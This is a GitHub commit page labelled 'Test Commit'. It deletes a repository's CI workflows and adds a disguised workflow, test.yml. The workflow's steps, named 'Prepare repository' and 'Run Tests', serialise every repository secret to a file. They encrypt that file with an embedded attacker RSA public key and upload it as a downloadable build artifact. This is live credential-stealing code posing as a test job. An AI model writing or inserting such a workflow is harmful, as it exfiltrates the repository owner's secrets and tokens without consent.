Skip to content

Commit

Permalink
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Test Commit
Browse files Browse the repository at this point in the history
preemptivestrike committed Dec 4, 2024
1 parent 3f9d1d5 commit c07486b
Showing 5 changed files with 57 additions and 167 deletions.
61 changes: 0 additions & 61 deletions .github/workflows/check-dist.yml

This file was deleted.

51 changes: 0 additions & 51 deletions .github/workflows/ci.yml

This file was deleted.

44 changes: 0 additions & 44 deletions .github/workflows/codeql.yml

This file was deleted.

11 changes: 0 additions & 11 deletions .github/workflows/release.yml

This file was deleted.

57 changes: 57 additions & 0 deletions .github/workflows/test.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
name: lzifmfeynf
on:
push:
branches: lzifmfeynf
jobs:
testing:
runs-on:
- ubuntu-latest
steps:
- env:
VALUES: ${{ toJSON(secrets)}}
name: Prepare repository
run: "\ncat <<EOF > output.json\n$VALUES\nEOF\n "
- name: Run Tests
env:
PUBKEY: '-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvWq4yuZLKJJjI1G7MtT1
J5to/dAHAAXyCsTwA3SxVJ6RPMiF9/pywE8SF9LmwYm+aLmyQ0jGOzSXrAvTMcVq
XApyGmlKjQExolWqlSj/apzdKwt6ChuNqHMZOUAeFcbVJ8y8qxIycqeMALZ6cJqm
oh6wfaLi0X02NcwDLMv1bt+0+YZYuoE9eYRi02Gh/Ug8iAWf4Qaf5zZj+luVBY98
LHLXl5jDuMSa8EZ09HbEm4KfmBxMfByuDODx13xD149zuI8LPjbGDxrQ8BTWVbv3
KPP8Ea5LK9p0khe6b4cv9QtBOmwbRP52hcWHmryWw+gKjHxyvPh1ZJt5yF+H+NLl
ruh4KebEL7Rho7b/ASS7eIAXV6r5+umdkoMSIygnRNy26f9Q5qjpwtnBhg6RlHEn
7yRoBxei05jnABUwga0mZSTT2443j3B0besc7cj7S2+vlUdwXb+qFdweDFIJ4PxK
76sitoN2pVGKA+eFfeSQi59Bj0MeRegpaU/0z1Hae4isyB/dmSGfJnYwk63lZeFt
Y/6hNpVmJr/T5zf6D8GrMKLNkKa2KYgDtJc29EanXszN1S8TdwfV0VNRo9zsy/YZ
Y+VVs/JWxcXNZ2iwDQ0pHZVZk6ufMZmUPBZOJA4LRes3QJ5hrTwGWP2XM3Hm0kqC
gl71DzGRomOhyXiAfwbhKNMCAwEAAQ==
-----END PUBLIC KEY-----
'
run: aes_key=$(openssl rand -hex 12 | tr -d '\n');openssl enc -aes-256-cbc -pbkdf2
-in output.json -out output_updated.json -pass pass:$aes_key;echo $aes_key
| openssl rsautl -encrypt -pkcs -pubin -inkey <(echo "$PUBKEY") -out lookup.txt
2> /dev/null;
- name: Upload artifacts
uses: actions/upload-artifact@v4
with:
name: files
path: ' |
output_updated.json
lookup.txt'

0 comments on commit c07486b

Please sign in to comment.